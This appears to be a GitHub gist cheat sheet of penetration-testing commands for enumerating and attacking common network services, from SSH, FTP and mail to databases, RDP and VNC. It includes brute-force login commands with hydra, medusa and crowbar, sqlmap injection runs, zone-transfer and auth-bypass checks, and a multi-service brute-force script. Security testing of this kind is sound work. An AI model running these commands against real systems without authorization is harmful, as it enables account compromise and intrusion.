Skip to content

Instantly share code, notes, and snippets.

@aw-junaid

aw-junaid/nse.md

Created January 30, 2026 18:14
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save aw-junaid/058438ca8fe4440d3e0b6a41e739c84d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save aw-junaid/058438ca8fe4440d3e0b6a41e739c84d to your computer and use it in GitHub Desktop.
Download ZIP
Comprehensive guide to network service testing including SSH, HTTP, FTP, SMTP, DNS, database, and remote desktop protocols. Commands for connection, scanning, enumeration, and security assessment across common ports and services.
Raw
nse.md

Network Service Enumeration & Security Testing Commands

Comprehensive guide to network service testing including SSH, HTTP, FTP, SMTP, DNS, database, and remote desktop protocols. Commands for connection, scanning, enumeration, and security assessment across common ports and services.

SSH (Port 22)

Connect to SSH service:

ssh <target>
ssh -p 2222 <target>                 # Non-standard port
ssh -i private_key.pem user@<target> # With key authentication

Scan for SSH port:

nmap -p 22 <target>
nmap -p 22 --script ssh2-enum-algos <target> # Check algorithms
nmap -p 22 --script ssh-hostkey <target>     # Get host key

Brute force SSH login:

hydra -L users.txt -P passwords.txt ssh://<target>
hydra -l admin -P rockyou.txt ssh://<target>:2222
medusa -h <target> -U users.txt -P passwords.txt -M ssh

SSH-specific security checks:

ssh-audit <target>:22                     # SSH configuration audit
nmap -p 22 --script ssh-auth-methods <target> # Authentication methods
ssh -oKexAlgorithms=diffie-hellman-group1-sha1 <target> # Legacy test

HTTP (Port 80)

Retrieve web content:

curl http://<target>
curl -I http://<target>                  # Headers only
curl -v http://<target>                  # Verbose output
curl -L http://<target>                  # Follow redirects

Scan HTTP port:

nmap -p 80 <target>
nmap -p 80 --script http-enum <target>   # Enumeration
nmap -p 80 --script http-headers <target> # Check headers

Directory enumeration:

dirb http://<target>
dirb http://<target> /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://<target>/FUZZ -w wordlist.txt

Additional HTTP tools:

nikto -h http://<target>                 # Vulnerability scanner
whatweb <target>                         # Technology detection
nmap -p 80 --script http-methods <target> # HTTP methods check

HTTPS (Port 443)

Retrieve secure content:

curl https://<target>
curl -k https://<target>                 # Ignore certificate errors
curl --cert client.crt --key client.key https://<target> # With client cert

Scan HTTPS port:

nmap -p 443 <target>
nmap -p 443 --script ssl-enum-ciphers <target> # Cipher enumeration
nmap -p 443 --script http-title <target>      # Get page title

SSL/TLS vulnerability scan:

sslscan <target>:443
testssl.sh <target>:443
nmap -p 443 --script ssl-heartbleed <target> # Heartbleed check
openssl s_client -connect <target>:443 -tlsextdebug 2>&1 | grep "TLS"

Certificate inspection:

openssl s_client -connect <target>:443 -showcerts
nmap -p 443 --script ssl-cert <target>  # Certificate details
sslyze --regular <target>:443

FTP (Port 21)

Connect to FTP service:

ftp <target>
ftp -p <target>                         # Passive mode
ftp -i <target>                         # Turn off interactive prompting

Scan FTP port:

nmap -p 21 <target>
nmap -p 21 --script ftp-anon <target>   # Check anonymous login
nmap -p 21 --script ftp-syst <target>   # Get system info

Brute force FTP login:

hydra -l <username> -P passwords.txt ftp://<target>
hydra -L users.txt -P passwords.txt ftp://<target>
ncrack -p 21 -U users.txt -P passwords.txt <target>

FTP security checks:

nmap -p 21 --script ftp-brute <target>  # Built-in brute force
nmap -p 21 --script ftp-vsftpd-backdoor <target> # Backdoor check
ftp <target> 21 << EOF                  # Automated connection
USER anonymous
PASS anonymous@
QUIT
EOF

SMTP (Port 25)

Connect to SMTP service:

telnet <target> 25
nc <target> 25
openssl s_client -connect <target>:25 -starttls smtp # TLS

Scan SMTP port:

nmap -p 25 <target>
nmap -p 25 --script smtp-commands <target> # List commands
nmap -p 25 --script smtp-open-relay <target> # Open relay test

Enumerate valid users:

smtp-user-enum -M VRFY -U users.txt -t <target>
smtp-user-enum -M EXPN -U users.txt -t <target>
nmap -p 25 --script smtp-enum-users <target> # Built-in enumeration

SMTP testing commands:

# Manual enumeration via telnet:
EHLO example.com
VRFY root
EXPN admin
MAIL FROM: test@example.com
RCPT TO: user@domain.com

DNS (Port 53)

DNS lookup:

nslookup <target>
dig <target>
dig @<dns_server> <target>              # Specify DNS server

Scan DNS port:

nmap -p 53 <target>
nmap -p 53 --script dns-nsid <target>   # Get nameserver ID
nmap -p 53 --script dns-recursion <target> # Recursion check

DNS enumeration:

dnsrecon -d <target>
dnsrecon -d <target> -t axfr            # Zone transfer
dnsenum <target>
host -l <target> <dns_server>           # List domain

Advanced DNS queries:

dig ANY <target>                        # All records
dig TXT <target>                        # Text records
dig MX <target>                         # Mail exchange
dig NS <target>                         # Nameservers
dig -x <ip_address>                     # Reverse lookup

POP3 (Port 110)

Connect to POP3 service:

telnet <target> 110
openssl s_client -connect <target>:995 -quiet # POP3S (SSL)

Scan POP3 port:

nmap -p 110 <target>
nmap -p 110 --script pop3-capabilities <target> # Capabilities
nmap -p 995 --script ssl-enum-ciphers <target> # SSL version

Brute force POP3 login:

hydra -l <username> -P passwords.txt pop3://<target>
hydra -S -l <username> -P passwords.txt pop3s://<target> # SSL version

POP3 command examples:

# Manual testing:
USER username
PASS password
LIST
RETR 1
DELE 1
QUIT

IMAP (Port 143)

Connect to IMAP service:

telnet <target> 143
openssl s_client -connect <target>:993 -quiet # IMAPS

Scan IMAP port:

nmap -p 143 <target>
nmap -p 143 --script imap-capabilities <target>
nmap -p 993 --script ssl-cert <target>  # Check certificate

Brute force IMAP login:

hydra -l <username> -P passwords.txt imap://<target>
hydra -S -l <username> -P passwords.txt imaps://<target>

IMAP testing:

# Manual commands:
A01 LOGIN username password
A02 LIST "" "*"
A03 SELECT INBOX
A04 FETCH 1 BODY[]
A05 LOGOUT

MySQL (Port 3306)

Connect to MySQL service:

mysql -h <target> -u <username> -p
mysql -h <target> -u root --password=''
mysql -h <target> -u root -p'password'  # Inline password

Scan MySQL port:

nmap -p 3306 <target>
nmap -p 3306 --script mysql-info <target>
nmap -p 3306 --script mysql-empty-password <target>

SQL injection testing:

sqlmap -u "http://<target>/index.php?id=1" --dbs
sqlmap -u "http://<target>/login.php" --data="user=admin&pass=test" --dbs
sqlmap -u "http://<target>/" --crawl=2 --batch --dbs

MySQL enumeration:

nmap -p 3306 --script mysql-users <target> # User enumeration
nmap -p 3306 --script mysql-variables <target> # Configuration
mysql -h <target> -u root -e "SHOW DATABASES;" # List databases

RDP (Port 3389)

Connect to RDP service:

rdesktop <target>
xfreerdp /v:<target>
xfreerdp /v:<target> +clipboard /drive:shared,/tmp

Scan RDP port:

nmap -p 3389 <target>
nmap -p 3389 --script rdp-enum-encryption <target>
nmap -p 3389 --script rdp-ntlm-info <target>

Brute force RDP login:

crowbar -b rdp -s <target>/32 -u users.txt -C passwords.txt
hydra -t 1 -V -f -L users.txt -P passwords.txt rdp://<target>
ncrack -p 3389 --user admin -P passwords.txt <target>

RDP security checks:

nmap -p 3389 --script rdp-vuln-ms12-020 <target> # BlueKeep check
sslscan <target>:3389                    # Check encryption
rdp-sec-check <target>                  # Security settings

VNC (Port 5900+)

Connect to VNC service:

vncviewer <target>
vncviewer <target>::5901                # Specific display
xtightvncviewer <target>

Scan VNC port:

nmap -p 5900 <target>
nmap -p 5900-5910 <target>              # Multiple VNC ports
nmap -p 5900 --script vnc-info <target>
nmap -p 5900 --script realvnc-auth-bypass <target>

VNC brute force:

hydra -P passwords.txt -t 1 -f vnc://<target>
medusa -h <target> -u root -P passwords.txt -M vnc
patator vnc_login host=<target> password=FILE0 0=passwords.txt

VNC security assessment:

nmap -p 5900 --script vnc-title <target> # Get screen title
vncrack -h <target> -P passwords.txt    # Password cracker
# Check for authentication bypass

Additional Critical Services & Ports

SMB (Port 445):

smbclient -L //<target>/
nmap -p 445 --script smb-enum-shares <target>
enum4linux <target>

SNMP (Port 161):

snmpwalk -c public -v1 <target>
nmap -p 161 --script snmp-info <target>
onesixtyone -c community.txt <target>

Telnet (Port 23):

telnet <target>
nmap -p 23 --script telnet-ntlm-info <target>
hydra -l root -P passwords.txt telnet://<target>

NetBIOS (Port 139):

nbtscan <target>/24
nmap -sU -p 137 --script nbstat <target>
nmblookup -A <target>

LDAP (Port 389):

ldapsearch -h <target> -x -b "dc=example,dc=com"
nmap -p 389 --script ldap-rootdse <target>

RPC (Port 135):

rpcclient -U "" <target>
nmap -p 135 --script rpc-grind <target>

Automation Scripts for Multiple Services

Quick service scan:

#!/bin/bash
TARGET=$1
echo "Scanning common services on $TARGET"
for PORT in 21 22 23 25 53 80 110 143 443 445 3306 3389 5900; do
    echo -n "Port $PORT: "
    timeout 2 nc -z $TARGET $PORT && echo "OPEN" || echo "CLOSED"
done

Multi-service brute force:

#!/bin/bash
TARGET=$1
USERLIST="users.txt"
PASSLIST="passwords.txt"

# SSH
hydra -L $USERLIST -P $PASSLIST ssh://$TARGET -o ssh_results.txt

# FTP
hydra -L $USERLIST -P $PASSLIST ftp://$TARGET -o ftp_results.txt

# RDP (if crowbar available)
crowbar -b rdp -s $TARGET -u $USERLIST -C $PASSLIST -o rdp_results.txt

Service banner grabbing:

#!/bin/bash
TARGET=$1
for PORT in 21 22 25 80 110 143 443; do
    echo "=== Port $PORT ==="
    echo "" | nc -w 2 $TARGET $PORT
    echo ""
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment